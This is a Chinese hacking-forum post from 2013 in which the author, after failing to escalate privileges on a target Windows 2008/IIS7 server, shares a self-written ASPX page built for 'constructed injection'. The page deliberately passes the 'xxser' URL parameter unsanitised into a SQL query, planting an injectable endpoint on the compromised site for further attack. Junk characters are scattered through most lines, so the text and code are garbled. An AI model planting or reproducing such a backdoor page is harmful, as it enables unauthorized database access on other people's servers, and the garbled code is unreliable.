昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
) _6 g1 c. D" t. l! ]其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。7 p+ U1 N/ T, u, M% R O$ q0 Y
代码量不多,自己写个拉倒了。烦死了。6 _# Y) D, K6 N
( ~) D( T9 a- k. j0 y, r
, q( ~8 P2 H0 {3 I, ]<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">% d8 Y8 M _! p0 x7 n) o
<html xmlns="http://www.w3.org/1999/xhtml">9 i; E- w N; J' P
<head runat="server">
9 D- Z/ U/ l4 A <title>暗影aspx构造注射专用页面</title>
# i1 v. r) X) R& K {1 K+ l</head>
- K/ u _8 ?7 J# t<body>, _# T# T2 F( ~1 H: a* r$ T; b
<form id="form1" runat="server">
8 f# n$ d4 s+ v) e; U# `1 W <div>) _- Y/ Q- V* m" [! G% \
<script language="c#" runat="server">
8 L/ t6 Y/ m5 ]: p 8 E4 H# B0 z H/ S! S$ v
void page_init(object sender, EventArgs e), ]8 I' v" Y- n. w, n
{
4 _, w! ?9 _/ J8 P
+ r' v5 n, ?% p! ] System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
- G7 G, `7 N/ }7 m+ Y" T# b
1 O( N4 j0 h: Z% T conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();2 @4 @9 ]4 ?+ W
conn.Open();
! F7 g0 t- Y8 w$ D
, q! \7 a5 j3 I6 H* r" I9 Y string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
! L: \4 t9 m$ P7 s7 s. I; [ ( r% f6 n8 k% m" u
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
) g. S6 B' x1 x4 X. J int x = command.ExecuteNonQuery();
* O1 D9 D7 s/ a* h! y" U& ` Response.Write(i+"\n");
/ k ~: y8 W0 W1 J Response.Write(x);+ l' G M" d+ c3 |& E" P
conn.Close();
7 o1 K8 C* o: G; @& t( b: ` }
" H! q; B. n9 ~
" I7 x# Y) `9 H' p9 t' Z7 _8 e </script>% k" W3 D5 ^" z
</div>: d6 V( C4 ]+ q- ?$ z! _8 H- Q2 ~
</form>
7 l3 \" o3 X% p</body>4 p& P) r& y9 Z9 ~/ g( z0 s
</html>- g O0 V1 W# C) |, @: h* [
|
发表于 2013-3-20 21:32:01
收藏
支持
反对